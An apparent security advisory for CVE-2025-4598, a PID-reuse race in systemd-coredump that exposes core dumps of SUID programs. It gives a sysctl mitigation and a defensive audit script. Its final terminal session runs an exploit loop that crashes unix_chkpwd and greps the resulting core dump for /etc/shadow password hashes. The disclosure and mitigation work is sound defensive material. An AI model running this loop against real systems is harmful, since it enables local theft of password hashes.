Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade systemd/systemd to version 257.6 or higher.
Affected versions of this package are vulnerable to a Signal Handler Race Condition due to a lack of protection in the grant_user_access() function, which decides whether a user should be allowed to read a core file. systemd-coredump identifies the crashed process only by its PID, which it looks up after the crash, so an attacker can crash a SUID program and, before systemd-coredump analyzes it, replace it with a non-SUID process that has reused the same PID; grant_user_access() then inspects the replacement and grants the attacker read access to the core dump of the SUID process. By the same technique, an attacker can crash root daemons that fork() and setuid() to the attacker's uid, and gain read access to the resulting core dumps and, through them, to memory the child inherited from the root daemon.
Note: Exploitation requires an unprivileged local account and a way to win the race; the window is narrow because systemd-coredump's initialization, during which the PID must be swapped, is short.
This vulnerability can be mitigated by disabling core dumps for SUID binaries (and, more generally, for any process whose credentials changed after exec). To do so, run the following command as the root user:

echo 0 > /proc/sys/fs/suid_dumpable

A value of 0 is also the kernel's default; a host is exposed when the setting is 2, which allows otherwise non-dumpable (privileged) processes to be dumped through the core_pattern pipe handler. The echo above lasts only until the next reboot; for a persistent setting put fs.suid_dumpable = 0 in a file under /etc/sysctl.d/ whose name sorts after any fragment that sets it to 2. This mitigates the vulnerability while the systemd package cannot be updated, at the cost of no longer being able to analyze crashes of such binaries.
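The following script is an added example, not code from the Snyk page, from Qualys or from the systemd project. It audits a host for exposure to this issue: it compares the running systemd version against the fix release given above (257.6), checks whether fs.suid_dumpable is 0, and can write the persistent sysctl.d form of the mitigation. The function names, the drop-in file name and the version parsing of `systemctl --version` output are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not code from the Snyk page, Qualys or the systemd project):
# audit a host for CVE-2025-4598 exposure by checking the running systemd
# version against the fix release named above (257.6) and whether SUID core
# dumps are disabled, and write the persistent form of the mitigation.
# Function names and the drop-in file name are this example's own choices.

FIXED_VERSION="257.6"

# Returns 0 when version $1 (e.g. "257.5", "258", "257.6-1.fc42") is >= FIXED_VERSION.
# sort -V orders 257.6 < 257.10 < 258, which plain string comparison would not.
# Caveat: a distribution backport that fixes the bug without bumping the upstream
# version string is reported as vulnerable here; check the package changelog then.
systemd_version_is_fixed() {
    lowest="$(printf '%s\n%s\n' "$FIXED_VERSION" "$1" | sort -V | head -n 1)"
    [ "$lowest" = "$FIXED_VERSION" ]
}

# Pulls the version out of `systemctl --version` output. Its first line looks like
# "systemd 257 (257.6-1.fc42)"; the parenthesised full version is preferred and the
# bare major number is used when no parenthesis is present.
systemd_version_from_output() {
    first="$(printf '%s\n' "$1" | head -n 1)"
    v="$(printf '%s\n' "$first" | sed -n 's/^systemd [0-9]* (\([^)]*\)).*/\1/p')"
    [ -n "$v" ] || v="$(printf '%s\n' "$first" | awk '$1 == "systemd" {print $2}')"
    printf '%s\n' "$v"
}

# Returns 0 when the sysctl value read from file $1 (default: the live
# /proc/sys/fs/suid_dumpable) is 0, i.e. processes whose credentials changed
# (SUID binaries, daemons that setuid()) never produce a core dump.
suid_dumpable_is_disabled() {
    val="$(tr -d '[:space:]' < "${1:-/proc/sys/fs/suid_dumpable}")"
    [ "$val" = "0" ]
}

# Persistent form of the echo above: writes a sysctl.d drop-in to $1. The default
# path is this example's choice; the 99- prefix makes it sort after other fragments.
write_suid_dumpable_dropin() {
    printf 'fs.suid_dumpable = 0\n' > "${1:-/etc/sysctl.d/99-suid-dumpable.conf}"
}

# Prints one verdict for the package version and one for the sysctl.
audit_host() {
    ver="$(systemd_version_from_output "$(systemctl --version 2>/dev/null)")"
    if [ -n "$ver" ] && systemd_version_is_fixed "$ver"; then
        echo "systemd $ver: at or above $FIXED_VERSION"
    else
        echo "systemd ${ver:-unknown}: below $FIXED_VERSION or unknown; upgrade, or apply the sysctl mitigation"
    fi
    if suid_dumpable_is_disabled; then
        echo "fs.suid_dumpable=0: core dumps of SUID/privileged processes disabled"
    else
        echo "fs.suid_dumpable is not 0: SUID core dumps enabled, mitigation not in place"
    fi
}

# Usage: sh audit.sh audit      (report only)
#        sh audit.sh mitigate   (as root: write the drop-in and apply it now)
case "${1:-}" in
    audit) audit_host ;;
    mitigate) write_suid_dumpable_dropin && sysctl -w fs.suid_dumpable=0 ;;
esac
```

The version check is deliberately conservative: on a distribution that backported the fix into an older version string, the script will still report the package as below 257.6, and the package changelog or the distribution's advisory is the authority in that case. The sysctl check, by contrast, reads the live kernel value and is exact.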
$ grep PRETTY_NAME= /etc/os-release
PRETTY_NAME="Fedora Linux 41 (Server Edition)"
$ id
uid=1001(evey) gid=1001(evey) groups=1001(evey) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
$ while true; do
    # Crash the SUID helper unix_chkpwd, which reads the named user's entry from /etc/shadow.
    # ./CVE-2025-4598 is the proof-of-concept driver; it prints the PID of the crashed process.
    pid="$(printf 'whatever\0' | ./CVE-2025-4598 /usr/sbin/unix_chkpwd "$USER" nullok)";
    # Wait until the systemd-coredump handler spawned by the kernel has exited.
    pidwait -f /usr/lib/systemd/systemd-coredump;
    # If the race was won the dump is readable by the unprivileged user; look for a
    # crypt(3) password hash of the form $id$salt$... in its memory.
    if coredumpctl -1 dump "$pid" 2>/dev/null | strings -a | grep '\$[0-9A-Za-z]\+\$[0-9A-Za-z./]'; then
        break;
    fi;
done